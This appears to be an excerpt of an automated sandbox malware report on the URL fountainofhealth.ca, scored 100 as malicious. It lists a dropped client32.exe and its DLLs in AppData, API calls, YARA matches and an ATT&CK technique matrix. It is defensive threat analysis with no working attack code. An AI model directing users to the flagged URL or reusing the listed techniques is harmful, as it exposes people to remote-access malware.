                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8BA30486 CreateNamedPipeW,34_2_00007FFC8BA30486
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11177075 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,37_2_11177075
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1103B160 SHGetFolderPathA,GetUserNameA,DeleteFileA,_sprintf,_fputs,_free,GetFileAttributesA,SetFileAttributesA,37_2_1103B160
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11174AE9 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,37_2_11174AE9
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_111450A0 wsprintfA,GetVersionExA,RegOpenKeyExA,_memset,_strncpy,RegCloseKey,37_2_111450A0
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11070090 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,37_2_11070090
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_110D8200 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError,37_2_110D8200
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_6CC8A980 EnterCriticalSection,LeaveCriticalSection,LeaveCriticalSection,LeaveCriticalSection,WSAGetLastError,socket,WSAGetLastError,#21,#21,#21,bind,WSAGetLastError,closesocket,htons,WSASetBlockingHook,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAUnhookBlockingHook,EnterCriticalSection,InitializeCriticalSection,getsockname,LeaveCriticalSection,GetTickCount,InterlockedExchange,37_2_6CC8A980
                                  Source: Yara match, File source: 37.0.client32.exe.d30000.0.unpack, type: UNPACKEDPE
                                  Source: Yara match, File source: 37.2.client32.exe.707b0000.5.unpack, type: UNPACKEDPE
                                  Source: Yara match, File source: 34.2.powershell.exe.28fcf164fe0.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara match, File source: 34.2.powershell.exe.28fcf0141a8.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara match, File source: 37.2.client32.exe.6cf80000.4.unpack, type: UNPACKEDPE
                                  Source: Yara match, File source: 34.2.powershell.exe.28fcf01e3f8.3.raw.unpack, type: UNPACKEDPE
                                  Source: Yara match, File source: 37.2.client32.exe.111b79e0.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara match, File source: 37.2.client32.exe.6cc80000.2.unpack, type: UNPACKEDPE
                                  Source: Yara match, File source: 37.2.client32.exe.11000000.0.unpack, type: UNPACKEDPE
                                  Source: Yara match, File source: 00000022.00000002.1908768239.0000028FCF01C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara match, File source: 00000025.00000002.2412047042.0000000000D32000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                                  Source: Yara match, File source: 00000025.00000002.2432223673.000000006CCC0000.00000002.00000001.01000000.00000014.sdmp, type: MEMORY
                                  Source: Yara match, File source: 00000025.00000002.2428598700.00000000111E1000.00000004.00000001.01000000.00000010.sdmp, type: MEMORY
                                  Source: Yara match, File source: 00000025.00000000.1919964679.0000000000D3F000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                                  Source: Yara match, File source: 00000022.00000002.1908768239.0000028FCF157000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara match, File source: 00000025.00000000.1919964679.0000000000D32000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                                  Source: Yara match, File source: 00000025.00000002.2428248444.0000000011193000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
                                  Source: Yara match, File source: 00000022.00000002.1908768239.0000028FCF011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara match, File source: 00000022.00000002.1908768239.0000028FCF048000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara match, File source: 00000022.00000002.1908768239.0000028FCEAD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara match, File source: Process Memory Space: powershell.exe PID: 2500, type: MEMORYSTR
                                  Source: Yara match, File source: Process Memory Space: client32.exe PID: 6788, type: MEMORYSTR
                                  Source: Yara match, File source: C:\Users\user\AppData\Roaming\Options\client32.exe, type: DROPPED
                                  Source: Yara match, File source: C:\Users\user\AppData\Roaming\Options\pcicapi.dll, type: DROPPED
                                  Source: Yara match, File source: C:\Users\user\AppData\Roaming\Options\PCICHEK.DLL, type: DROPPED
                                  Source: Yara match, File source: C:\Users\user\AppData\Roaming\Options\HTCTL32.DLL, type: DROPPED
                                  Source: Yara match, File source: C:\Users\user\AppData\Roaming\Options\TCCTL32.DLL, type: DROPPED
                                  Source: Yara match, File source: C:\Users\user\AppData\Roaming\Options\PCICL32.DLL, type: DROPPED
                                  Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                                  Gather Victim Identity Information11
                                  Scripting
                                  2
                                  Valid Accounts
                                  1
                                  Windows Management Instrumentation
                                  11
                                  Scripting
                                  1
                                  DLL Side-Loading
                                  11
                                  Deobfuscate/Decode Files or Information
                                  1
                                  Credential API Hooking
                                  12
                                  System Time Discovery
                                  Remote Services1
                                  Archive Collected Data
                                  3
                                  Ingress Tool Transfer
                                  Exfiltration Over Other Network Medium1
                                  System Shutdown/Reboot
                                  CredentialsDomainsDefault Accounts4
                                  Native API
                                  1
                                  DLL Side-Loading
                                  1
                                  Extra Window Memory Injection
                                  3
                                  Obfuscated Files or Information
                                  121
                                  Input Capture
                                  1
                                  Account Discovery
                                  Remote Desktop Protocol1
                                  Screen Capture
                                  21
                                  Encrypted Channel
                                  Exfiltration Over Bluetooth1
                                  Defacement
                                  Email AddressesDNS ServerDomain Accounts1
                                  Command and Scripting Interpreter
                                  2
                                  Valid Accounts
                                  2
                                  Valid Accounts
                                  1
                                  Software Packing
                                  Security Account Manager3
                                  File and Directory Discovery
                                  SMB/Windows Admin Shares1
                                  Credential API Hooking
                                  4
                                  Non-Application Layer Protocol
                                  Automated ExfiltrationData Encrypted for Impact
                                  Employee NamesVirtual Private ServerLocal Accounts2
                                  Service Execution
                                  1
                                  Windows Service
                                  21
                                  Access Token Manipulation
                                  1
                                  DLL Side-Loading
                                  NTDS34
                                  System Information Discovery
                                  Distributed Component Object Model121
                                  Input Capture
                                  5
                                  Application Layer Protocol
                                  Traffic DuplicationData Destruction
                                  Gather Victim Network InformationServerCloud Accounts2
                                  PowerShell
                                  2
                                  Browser Extensions
                                  1
                                  Windows Service
                                  1
                                  Extra Window Memory Injection
                                  LSA Secrets251
                                  Security Software Discovery
                                  SSH3
                                  Clipboard Data
                                  Fallback ChannelsScheduled TransferData Encrypted for Impact
                                  Domain PropertiesBotnetReplication Through Removable MediaScheduled Task1
                                  Registry Run Keys / Startup Folder
                                  13
                                  Process Injection
                                  1
                                  Masquerading
                                  Cached Domain Credentials2
                                  Process Discovery
                                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                                  Registry Run Keys / Startup Folder
                                  2
                                  Valid Accounts
                                  DCSync31
                                  Virtualization/Sandbox Evasion
                                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                                  Modify Registry
                                  Proc Filesystem11
                                  Application Window Discovery
                                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt31
                                  Virtualization/Sandbox Evasion
                                  /etc/passwd and /etc/shadow1
                                  System Owner/User Discovery
                                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
                                  Access Token Manipulation
                                  Network Sniffing1
                                  System Network Configuration Discovery
                                  Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd13
                                  Process Injection
                                  Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                                  Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                                  Rundll32
                                  KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                                  Legend:

                                  • Process
                                  • Signature
                                  • Created File
                                  • DNS/IP Info
                                  • Is Dropped
                                  • Is Windows Process
                                  • Number of created Registry Values
                                  • Number of created Files
                                  • Visual Basic
                                  • Delphi
                                  • Java
                                  • .Net C# or VB.NET
                                  • C, C++ or other language
                                  • Is malicious
                                  • Internet
                                  [Behavior graph] Behavior Graph ID: 1696974, URL: http://fountainofhealth.ca, Startdate: 22/05/2025, Architecture: WINDOWS, Score: 100

                                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.